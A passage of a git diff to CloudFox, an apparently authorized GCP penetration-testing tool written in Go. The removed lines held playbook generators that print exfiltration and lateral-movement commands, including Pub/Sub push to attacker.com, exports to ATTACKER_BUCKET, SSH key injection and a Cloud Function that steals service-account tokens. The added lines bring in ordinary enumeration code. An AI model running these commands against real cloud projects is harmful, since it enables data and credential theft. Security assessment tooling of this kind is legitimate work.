--log-filter='protoPayload.@type=\"type.googleapis.com/google.cloud.audit.AuditLog\"'\n") - sections.WriteString("```\n\n") - } - - // Pub/Sub paths (combine all Pub/Sub categories) - pubsubPaths := append(categories["Pub/Sub Push"], categories["Pub/Sub BigQuery Export"]...) - pubsubPaths = append(pubsubPaths, categories["Pub/Sub GCS Export"]...) - if len(pubsubPaths) > 0 { - sections.WriteString("## Pub/Sub Exfiltration Paths\n\n") - sections.WriteString("These Pub/Sub configurations enable data exfiltration.\n\n") - sections.WriteString("### Identified Paths:\n") - for _, path := range pubsubPaths { - dest := path.Description - if dest == "" { - dest = path.TargetResource - } - sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.TargetResource, dest)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create push subscription to attacker endpoint\n") - sections.WriteString("gcloud pubsub subscriptions create exfil-sub \\\n") - sections.WriteString(" --topic=TOPIC_NAME \\\n") - sections.WriteString(" --push-endpoint=https://attacker.com/receive\n\n") - sections.WriteString("# Or create pull subscription and export\n") - sections.WriteString("gcloud pubsub subscriptions create exfil-pull --topic=TOPIC_NAME\n") - sections.WriteString("gcloud pubsub subscriptions pull exfil-pull --limit=1000 --auto-ack\n") - sections.WriteString("```\n\n") - } - - // Public BigQuery - if len(categories["Public BigQuery"]) > 0 { - sections.WriteString("## Public BigQuery Datasets\n\n") - sections.WriteString("These BigQuery datasets are publicly accessible.\n\n") - sections.WriteString("### Vulnerable Datasets:\n") - for _, path := range categories["Public BigQuery"] { - sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Export table to GCS bucket\n") - sections.WriteString("bq extract \\\n") - sections.WriteString(" --destination_format=NEWLINE_DELIMITED_JSON \\\n") - sections.WriteString(" 'PROJECT:DATASET.TABLE' \\\n") - sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data-*.json\n\n") - sections.WriteString("# Query and save locally\n") - sections.WriteString("bq query --format=json 'SELECT * FROM PROJECT.DATASET.TABLE' > exfil.json\n\n") - sections.WriteString("# Copy dataset to attacker project\n") - sections.WriteString("bq cp PROJECT:DATASET.TABLE ATTACKER_PROJECT:EXFIL_DATASET.TABLE\n") - sections.WriteString("```\n\n") - } - - // Cloud SQL Export - if len(categories["Cloud SQL Export"]) > 0 { - sections.WriteString("## Cloud SQL Export Capabilities\n\n") - sections.WriteString("These Cloud SQL instances have export capabilities.\n\n") - sections.WriteString("### Identified Instances:\n") - for _, path := range categories["Cloud SQL Export"] { - sections.WriteString(fmt.Sprintf("- %s in %s\n", path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Export database to GCS\n") - sections.WriteString("gcloud sql export sql INSTANCE_NAME \\\n") - sections.WriteString(" gs://ATTACKER_BUCKET/exfil/dump.sql \\\n") - sections.WriteString(" --database=DATABASE_NAME\n\n") - sections.WriteString("# Export as CSV\n") - sections.WriteString("gcloud sql export csv INSTANCE_NAME \\\n") - sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data.csv \\\n") - sections.WriteString(" --database=DATABASE_NAME \\\n") - sections.WriteString(" --query='SELECT * FROM sensitive_table'\n") - sections.WriteString("```\n\n") - } - - // Storage Transfer Jobs (actual misconfigured jobs) - if len(categories["Storage Transfer Job"]) > 0 { - sections.WriteString("## Storage Transfer Service Jobs\n\n") - sections.WriteString("These storage transfer jobs export data to external destinations.\n\n") - sections.WriteString("### Identified Jobs:\n") - for _, path := range categories["Storage Transfer Job"] { - dest := path.Description - if dest == "" { - dest = path.TargetResource - } - sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.TargetResource, dest)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create transfer job to external AWS S3\n") - sections.WriteString("gcloud transfer jobs create \\\n") - sections.WriteString(" gs://SOURCE_BUCKET \\\n") - sections.WriteString(" s3://attacker-bucket \\\n") - sections.WriteString(" --source-creds-file=gcs-creds.json\n") - sections.WriteString("```\n\n") - } - - // Potential Vectors - if len(categories["Potential Vector"]) > 0 { - sections.WriteString("## Potential Exfiltration Vectors\n\n") - sections.WriteString("These resources could be used for data exfiltration if compromised.\n\n") - sections.WriteString("### Identified Vectors:\n") - for _, path := range categories["Potential Vector"] { - sections.WriteString(fmt.Sprintf("- %s (%s) in %s\n", path.TargetResource, path.Method, path.ProjectID)) - } - sections.WriteString("\n") - } - - return sections.String() -} - -// GenerateLateralPlaybook generates a comprehensive lateral movement playbook from attack paths -func GenerateLateralPlaybook(paths []AttackPath, identityHeader string) string { - if len(paths) == 0 { - return "" - } - - var sections strings.Builder - if identityHeader != "" { - sections.WriteString(fmt.Sprintf(`# Lateral Movement Playbook for %s -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified lateral movement capabilities. - -`, identityHeader)) - } else { - sections.WriteString(`# GCP Lateral Movement Playbook -# Generated by CloudFox -# -# This playbook provides exploitation techniques for identified lateral movement capabilities. - -`) - } - - // Group by category - categories := map[string][]AttackPath{ - "Network": {}, - "SA Impersonation": {}, - "Compute Sharing": {}, - "Compute Access": {}, - "GKE": {}, - "Database Access": {}, - "Shared VPC": {}, - "Service Account Impersonation": {}, - "Service Account Key Creation": {}, - "Compute Instance Token Theft": {}, - "Cloud Function Token Theft": {}, - "Cloud Run Token Theft": {}, - "GKE Cluster Token Theft": {}, - "GKE Node Pool Token Theft": {}, - } - - for _, path := range paths { - if _, ok := categories[path.Category]; ok { - categories[path.Category] = append(categories[path.Category], path) - } - } - - // Network - if len(categories["Network"]) > 0 { - sections.WriteString("## Network-Based Lateral Movement\n\n") - sections.WriteString("Principals with network permissions can modify network configurations for lateral movement.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Network"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation - VPC Peering:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create VPC peering to another project's network\n") - sections.WriteString("gcloud compute networks peerings create pivot \\\n") - sections.WriteString(" --network=SOURCE_NETWORK \\\n") - sections.WriteString(" --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - Firewall Rules:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create firewall rule to allow access\n") - sections.WriteString("gcloud compute firewall-rules create allow-pivot \\\n") - sections.WriteString(" --network=NETWORK --allow=tcp:22,tcp:3389 \\\n") - sections.WriteString(" --source-ranges=ATTACKER_IP/32\n") - sections.WriteString("```\n\n") - sections.WriteString("### Exploitation - IAP Tunnel:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Start IAP tunnel to SSH port\n") - sections.WriteString("gcloud compute start-iap-tunnel INSTANCE_NAME 22 \\\n") - sections.WriteString(" --local-host-port=localhost:2222 --zone=us-central1-a\n\n") - sections.WriteString("# SSH through the tunnel\n") - sections.WriteString("ssh -p 2222 user@localhost\n") - sections.WriteString("```\n\n") - } - - // SA Impersonation - if len(categories["SA Impersonation"]) > 0 { - sections.WriteString("## Service Account Impersonation\n\n") - sections.WriteString("Principals with impersonation capabilities can pivot to other service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["SA Impersonation"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Generate access token for target SA\n") - sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Use token with any gcloud command\n") - sections.WriteString("gcloud compute instances list --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // Compute Access - if len(categories["Compute Access"]) > 0 { - sections.WriteString("## Compute Instance Access\n\n") - sections.WriteString("Principals with compute access can SSH into instances via OS Login or metadata modification.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Compute Access"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# SSH via OS Login (compute.instances.osLogin)\n") - sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n\n") - sections.WriteString("# SSH via OS Login with sudo (compute.instances.osAdminLogin)\n") - sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n") - sections.WriteString("# Then run: sudo su\n\n") - sections.WriteString("# Inject SSH key via instance metadata\n") - sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") - sections.WriteString("# Inject SSH key project-wide\n") - sections.WriteString("gcloud compute project-info add-metadata \\\n") - sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") - sections.WriteString("```\n\n") - } - - // GKE - if len(categories["GKE"]) > 0 { - sections.WriteString("## GKE Cluster Access\n\n") - sections.WriteString("Principals with GKE permissions can access clusters and pivot within them.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["GKE"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Get cluster credentials\n") - sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT\n\n") - sections.WriteString("# If Workload Identity is NOT enabled, steal node SA token from any pod:\n") - sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") - sections.WriteString("# List secrets for credentials\n") - sections.WriteString("kubectl get secrets -A -o yaml\n") - sections.WriteString("```\n\n") - } - - // Database Access - if len(categories["Database Access"]) > 0 { - sections.WriteString("## Database Access\n\n") - sections.WriteString("Principals with database permissions can connect to database instances.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Database Access"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Connect to Cloud SQL instance\n") - sections.WriteString("gcloud sql connect INSTANCE_NAME --user=USER --project=PROJECT\n\n") - sections.WriteString("# Create database user for persistence\n") - sections.WriteString("gcloud sql users create attacker --instance=INSTANCE_NAME --password=PASSWORD\n") - sections.WriteString("```\n\n") - } - - // Compute Sharing - if len(categories["Compute Sharing"]) > 0 { - sections.WriteString("## Compute Resource Sharing\n\n") - sections.WriteString("Principals with compute sharing permissions can share images/snapshots with external projects.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Compute Sharing"] { - sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Share VM image with external project\n") - sections.WriteString("gcloud compute images add-iam-policy-binding IMAGE_NAME \\\n") - sections.WriteString(" --member='user:attacker@external.com' --role='roles/compute.imageUser'\n\n") - sections.WriteString("# Share snapshot with external project\n") - sections.WriteString("gcloud compute snapshots add-iam-policy-binding SNAPSHOT_NAME \\\n") - sections.WriteString(" --member='user:attacker@external.com' --role='roles/compute.storageAdmin'\n") - sections.WriteString("```\n\n") - } - - // Service Account Impersonation (from lateral movement module) - if len(categories["Service Account Impersonation"]) > 0 { - sections.WriteString("## Service Account Impersonation Chains\n\n") - sections.WriteString("These principals can impersonate service accounts to gain their permissions.\n\n") - sections.WriteString("### Identified Chains:\n") - for _, path := range categories["Service Account Impersonation"] { - sections.WriteString(fmt.Sprintf("- %s -> %s\n", path.Principal, path.TargetResource)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Generate access token for target SA\n") - sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Use token with any gcloud command\n") - sections.WriteString("gcloud compute instances list --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") - sections.WriteString("```\n\n") - } - - // Service Account Key Creation - if len(categories["Service Account Key Creation"]) > 0 { - sections.WriteString("## Service Account Key Creation\n\n") - sections.WriteString("These principals can create persistent keys for service accounts.\n\n") - sections.WriteString("### Principals with this capability:\n") - for _, path := range categories["Service Account Key Creation"] { - sections.WriteString(fmt.Sprintf("- %s can create keys for %s\n", path.Principal, path.TargetResource)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create persistent key for long-term access\n") - sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") - sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Activate the key\n") - sections.WriteString("gcloud auth activate-service-account --key-file=key.json\n") - sections.WriteString("```\n\n") - } - - // Compute Instance Token Theft - if len(categories["Compute Instance Token Theft"]) > 0 { - sections.WriteString("## Compute Instance Token Theft\n\n") - sections.WriteString("These compute instances have attached service accounts whose tokens can be stolen via the metadata server.\n\n") - sections.WriteString("### Vulnerable Instances:\n") - for _, path := range categories["Compute Instance Token Theft"] { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# SSH into the instance\n") - sections.WriteString("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=PROJECT_ID\n\n") - sections.WriteString("# Steal SA token from metadata server\n") - sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") - sections.WriteString("# Get SA email\n") - sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email'\n\n") - sections.WriteString("# Use token with curl\n") - sections.WriteString("TOKEN=$(curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' | jq -r .access_token)\n") - sections.WriteString("curl -H \"Authorization: Bearer $TOKEN\" \\\n") - sections.WriteString(" 'https://www.googleapis.com/compute/v1/projects/PROJECT/zones/ZONE/instances'\n") - sections.WriteString("```\n\n") - } - - // Cloud Functions Token Theft - if len(categories["Cloud Function Token Theft"]) > 0 { - sections.WriteString("## Cloud Functions Token Theft\n\n") - sections.WriteString("These Cloud Functions have attached service accounts. Deploy a malicious function to steal tokens.\n\n") - sections.WriteString("### Vulnerable Functions:\n") - for _, path := range categories["Cloud Function Token Theft"] { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Create token stealer function\n") - sections.WriteString("mkdir /tmp/fn-stealer && cd /tmp/fn-stealer\n\n") - sections.WriteString("cat > main.py << 'EOF'\n") - sections.WriteString("import functions_framework\n") - sections.WriteString("import requests\n\n") - sections.WriteString("@functions_framework.http\n") - sections.WriteString("def steal(request):\n") - sections.WriteString(" r = requests.get(\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") - sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") - sections.WriteString(" return r.json()\n") - sections.WriteString("EOF\n\n") - sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") - sections.WriteString("# Deploy with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs)\n") - sections.WriteString("gcloud functions deploy stealer --gen2 --runtime=python311 \\\n") - sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") - sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") - sections.WriteString("# Invoke to get token\n") - sections.WriteString("curl $(gcloud functions describe stealer --format='value(url)')\n") - sections.WriteString("```\n\n") - } - - // Cloud Run Token Theft - if len(categories["Cloud Run Token Theft"]) > 0 { - sections.WriteString("## Cloud Run Token Theft\n\n") - sections.WriteString("These Cloud Run services have attached service accounts.\n\n") - sections.WriteString("### Vulnerable Services:\n") - for _, path := range categories["Cloud Run Token Theft"] { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Deploy Cloud Run service with target SA\n") - sections.WriteString("# (requires run.services.create + iam.serviceAccounts.actAs)\n") - sections.WriteString("gcloud run deploy stealer --image=gcr.io/PROJECT/stealer \\\n") - sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") - sections.WriteString(" --allow-unauthenticated\n\n") - sections.WriteString("# Container code fetches token from metadata server same as compute\n") - sections.WriteString("```\n\n") - } - - // GKE Cluster Token Theft - if len(categories["GKE Cluster Token Theft"]) > 0 || len(categories["GKE Node Pool Token Theft"]) > 0 { - sections.WriteString("## GKE Cluster Token Theft\n\n") - sections.WriteString("These GKE clusters have node service accounts that can be accessed from pods.\n\n") - sections.WriteString("### Vulnerable Clusters:\n") - for _, path := range categories["GKE Cluster Token Theft"] { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) - } - for _, path := range categories["GKE Node Pool Token Theft"] { - sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", path.Principal, path.TargetResource, path.ProjectID)) - } - sections.WriteString("\n### Exploitation:\n") - sections.WriteString("```bash\n") - sections.WriteString("# Get cluster credentials\n") - sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT\n\n") - sections.WriteString("# If Workload Identity is NOT enabled, steal node SA token from any pod:\n") - sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") - sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") - sections.WriteString("# If Workload Identity IS enabled, check for pod SA token:\n") - sections.WriteString("kubectl exec -it POD -- cat /var/run/secrets/kubernetes.io/serviceaccount/token\n\n") - sections.WriteString("# List secrets for credentials\n") - sections.WriteString("kubectl get secrets -A -o yaml\n") - sections.WriteString("```\n\n") - } - - return sections.String() -} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go index 692914da..748792aa 100644 --- a/gcp/services/bucketEnumService/bucketEnumService.go +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -46,6 +46,7 @@ type SensitiveFileInfo struct { Updated string `json:"updated"` StorageClass string `json:"storageClass"` IsPublic bool `json:"isPublic"` // Whether the object has public access + Encryption string `json:"encryption"` // Encryption type (Google-managed or CMEK key name) } // SensitivePatterns defines patterns to search for sensitive files @@ -211,6 +212,7 @@ func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketNa Updated: obj.Updated, StorageClass: obj.StorageClass, IsPublic: isPublic, + Encryption: s.getObjectEncryption(obj), } } } @@ -234,6 +236,30 @@ func (s *BucketEnumService) isObjectPublic(obj *storage.Object) bool { return false } +// getObjectEncryption returns the encryption type for an object +// Returns "CMEK (key-name)" if using customer-managed key, or "Google-managed" otherwise +func (s *BucketEnumService) getObjectEncryption(obj *storage.Object) string { + if obj == nil { + return "Google-managed" + } + + // Check if the object uses a customer-managed encryption key (CMEK) + if obj.KmsKeyName != "" { + // Extract just the key name from the full resource path + // Format: projects/{project}/locations/{location}/keyRings/{keyRing}/cryptoKeys/{key}/cryptoKeyVersions/{version} + keyParts := strings.Split(obj.KmsKeyName, "/") + if len(keyParts) >= 8 { + // Get the key name (index 7 is cryptoKeys/{key}) + keyName := keyParts[7] + return fmt.Sprintf("CMEK (%s)", keyName) + } + return "CMEK" + } + + // Default is Google-managed encryption + return "Google-managed" +} + func (s *BucketEnumService) isFalsePositive(objectName string, pattern SensitivePattern) bool { nameLower := strings.ToLower(objectName) @@ -283,6 +309,7 @@ type ObjectInfo struct { StorageClass string `json:"storageClass"` IsPublic bool `json:"isPublic"` DownloadCmd string `json:"downloadCmd"` + Encryption string `json:"encryption"` // Encryption type (Google-managed or CMEK key name) } // EnumerateAllBucketObjects lists ALL objects in a bucket (no filtering) @@ -318,6 +345,7 @@ func (s *BucketEnumService) EnumerateAllBucketObjects(bucketName, projectID stri StorageClass: obj.StorageClass, IsPublic: isPublic, DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Encryption: s.getObjectEncryption(obj), }) objectCount++ } diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index 7ab818a3..a63b3168 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -36,14 +36,33 @@ type IAMBinding struct { Member string `json:"member"` } +// InstanceType represents the type/manager of an instance +type InstanceType string + +const ( + InstanceTypeStandalone InstanceType = "Standalone" // Regular VM + InstanceTypeGKE InstanceType = "GKE" // GKE node + InstanceTypeMIG InstanceType = "MIG" // Managed Instance Group + InstanceTypeDataproc InstanceType = "Dataproc" // Dataproc cluster node + InstanceTypeDataflow InstanceType = "Dataflow" // Dataflow worker + InstanceTypeComposer InstanceType = "Composer" // Cloud Composer worker + InstanceTypeNotebooks InstanceType = "Notebooks" // Vertex AI Workbench / AI Platform Notebooks + InstanceTypeBatchJob InstanceType = "Batch" // Cloud Batch job + InstanceTypeCloudRun InstanceType = "CloudRun" // Cloud Run (Jobs) execution environment + InstanceTypeFilestore InstanceType = "Filestore" // Filestore instance + InstanceTypeSQLProxy InstanceType = "CloudSQL" // Cloud SQL Proxy + InstanceTypeAppEngine InstanceType = "AppEngine" // App Engine Flex +) + // ComputeEngineInfo contains instance metadata and security-relevant configuration type ComputeEngineInfo struct { // Basic info - Name string `json:"name"` - ID string `json:"id"` - Zone string `json:"zone"` - State string `json:"state"` - ProjectID string `json:"projectID"` + Name string `json:"name"` + ID string `json:"id"` + Zone string `json:"zone"` + State string `json:"state"` + ProjectID string `json:"projectID"` + InstanceType InstanceType `json:"instanceType"` // Type of instance (GKE, MIG, Dataproc, etc.) // Network configuration ExternalIP string `json:"externalIP"` @@ -92,6 +111,7 @@ type ComputeEngineInfo struct { // Timestamps CreationTimestamp string `json:"creationTimestamp"` LastStartTimestamp string `json:"lastStartTimestamp"` + LastSnapshotDate string `json:"lastSnapshotDate"` // Most recent snapshot date for any attached disk // IAM bindings IAMBindings []IAMBinding `json:"iamBindings"` @@ -186,6 +206,7 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf ID: fmt.Sprintf("%v", instance.Id), Zone: zone, State: instance.Status, + InstanceType: detectInstanceType(instance), ExternalIP: getExternalIP(instance), InternalIP: getInternalIP(instance), NetworkInterfaces: instance.NetworkInterfaces, @@ -241,6 +262,9 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf // Parse boot disk encryption info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) + // Get last snapshot date for this instance's disks + info.LastSnapshotDate = ces.getLastSnapshotForDisks(computeService, projectID, instance.Disks) + // Fetch IAM bindings for this instance (may fail silently if no permission) info.IAMBindings = ces.getInstanceIAMBindings(computeService, projectID, zone, instance.Name) @@ -684,6 +708,89 @@ func isValidVarName(s string) bool { return true } +// detectInstanceType determines the type of instance based on labels and name patterns +func detectInstanceType(instance *compute.Instance) InstanceType { + if instance == nil { + return InstanceTypeStandalone + } + + labels := instance.Labels + name := instance.Name + + // Check labels first (most reliable) + if labels != nil { + // GKE nodes have goog-gke-node label + if _, ok := labels["goog-gke-node"]; ok { + return InstanceTypeGKE + } + // Also check for gke-cluster label + if _, ok := labels["gke-cluster"]; ok { + return InstanceTypeGKE + } + + // Dataproc nodes have goog-dataproc-cluster-name label + if _, ok := labels["goog-dataproc-cluster-name"]; ok { + return InstanceTypeDataproc + } + + // Dataflow workers have goog-dataflow-job-id label + if _, ok := labels["goog-dataflow-job-id"]; ok { + return InstanceTypeDataflow + } + + // Cloud Composer workers have goog-composer-environment label + if _, ok := labels["goog-composer-environment"]; ok { + return InstanceTypeComposer + } + + // Vertex AI Workbench / AI Platform Notebooks + if _, ok := labels["goog-notebooks-instance"]; ok { + return InstanceTypeNotebooks + } + // Also check for workbench label + if _, ok := labels["goog-workbench-instance"]; ok { + return InstanceTypeNotebooks + } + + // Cloud Batch jobs have goog-batch-job-uid label + if _, ok := labels["goog-batch-job-uid"]; ok { + return InstanceTypeBatchJob + } + + // App Engine Flex instances + if _, ok := labels["goog-appengine-version"]; ok { + return InstanceTypeAppEngine + } + if _, ok := labels["gae_app"]; ok { + return InstanceTypeAppEngine + } + } + + // Check name patterns as fallback + // GKE node names typically follow pattern: gke-{cluster}-{pool}-{hash} + if strings.HasPrefix(name, "gke-") { + return InstanceTypeGKE + } + + // Dataproc nodes: {cluster}-m (master) or {cluster}-w-{n} (worker) + if strings.Contains(name, "-m") || strings.Contains(name, "-w-") { + // This is too generic, rely on labels instead + } + + // Check for created-by metadata which indicates MIG + if instance.Metadata != nil { + for _, item := range instance.Metadata.Items { + if item != nil && item.Key == "created-by" && item.Value != nil { + if strings.Contains(*item.Value, "instanceGroupManagers") { + return InstanceTypeMIG + } + } + } + } + + return InstanceTypeStandalone +} + // parseBootDiskEncryption checks the boot disk encryption type func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) { encryptionType = "Google-managed" @@ -707,6 +814,59 @@ func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kms return } +// getLastSnapshotForDisks gets the most recent snapshot date for any of the given disks +func (ces *ComputeEngineService) getLastSnapshotForDisks(service *compute.Service, projectID string, disks []*compute.AttachedDisk) string { + ctx := context.Background() + + // Collect all disk names from the instance + diskNames := make(map[string]bool) + for _, disk := range disks { + if disk == nil || disk.Source == "" { + continue + } + // Extract disk name from source URL + // Format: projects/{project}/zones/{zone}/disks/{diskName} + parts := strings.Split(disk.Source, "/") + if len(parts) > 0 { + diskNames[parts[len(parts)-1]] = true + } + } + + if len(diskNames) == 0 { + return "" + } + + // List all snapshots in the project and find ones matching our disks + var latestSnapshot string + req := service.Snapshots.List(projectID) + err := req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + if snapshot == nil || snapshot.SourceDisk == "" { + continue + } + // Extract disk name from source disk URL + parts := strings.Split(snapshot.SourceDisk, "/") + if len(parts) > 0 { + diskName := parts[len(parts)-1] + if diskNames[diskName] { + // Compare timestamps - keep the most recent + if latestSnapshot == "" || snapshot.CreationTimestamp > latestSnapshot { + latestSnapshot = snapshot.CreationTimestamp + } + } + } + } + return nil + }) + + if err != nil { + // Silently fail - user may not have permission to list snapshots + return "" + } + + return latestSnapshot +} + // FormatScopes formats service account scopes for display func FormatScopes(scopes []string) string { if len(scopes) == 0 { diff --git a/gcp/services/foxmapperService/foxmapperService.go b/gcp/services/foxmapperService/foxmapperService.go new file mode 100644 index 00000000..596669c5 --- /dev/null +++ b/gcp/services/foxmapperService/foxmapperService.go @@ -0,0 +1,1659 @@ +package foxmapperService + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "runtime" + "sort" + "strings" + + "github.com/dominikbraun/graph" +) + +// Node represents a GCP IAM principal from FoxMapper graph +type Node struct { + MemberID string `json:"member_id"` + MemberType string `json:"member_type"` + Email string `json:"email"` + DisplayName string `json:"display_name"` + ProjectID string `json:"project_id"` + UniqueID string `json:"unique_id"` + IAMBindings []map[string]any `json:"iam_bindings"` + IsAdmin bool `json:"is_admin"` + AdminLevel string `json:"admin_level"` // org, folder, project + IsDisabled bool `json:"is_disabled"` + HasKeys bool `json:"has_keys"` + KeyCount int `json:"key_count"` + Tags map[string]string `json:"tags"` + Description string `json:"description"` + OAuth2ClientID string `json:"oauth2_client_id"` + AttachedResources []map[string]any `json:"attached_resources"` + WorkloadIdentityBindings []map[string]any `json:"workload_identity_bindings"` + GroupMemberships []string `json:"group_memberships"` + Domain string `json:"domain"` + // Computed fields + PathToAdmin bool + CanPrivEscToAdminString string + IsAdminString string +} + +// FlexibleBool handles JSON that may be bool, array, or other types +// Used for scope_limited which may vary between FoxMapper versions +type FlexibleBool bool + +func (fb *FlexibleBool) UnmarshalJSON(data []byte) error { + // Try bool first + var b bool + if err := json.Unmarshal(data, &b); err == nil { + *fb = FlexibleBool(b) + return nil + } + + // Try array (non-empty array = true) + var arr []interface{} + if err := json.Unmarshal(data, &arr); err == nil { + *fb = FlexibleBool(len(arr) > 0) + return nil + } + + // Try string ("true"/"false") + var s string + if err := json.Unmarshal(data, &s); err == nil { + *fb = FlexibleBool(s == "true" || s == "True" || s == "1") + return nil + } + + // Default to false + *fb = false + return nil +} + +// Edge represents a privilege escalation edge from FoxMapper graph +type Edge struct { + Source string `json:"source"` + Destination string `json:"destination"` + Reason string `json:"reason"` + ShortReason string `json:"short_reason"` + EdgeType string `json:"edge_type"` + Resource string 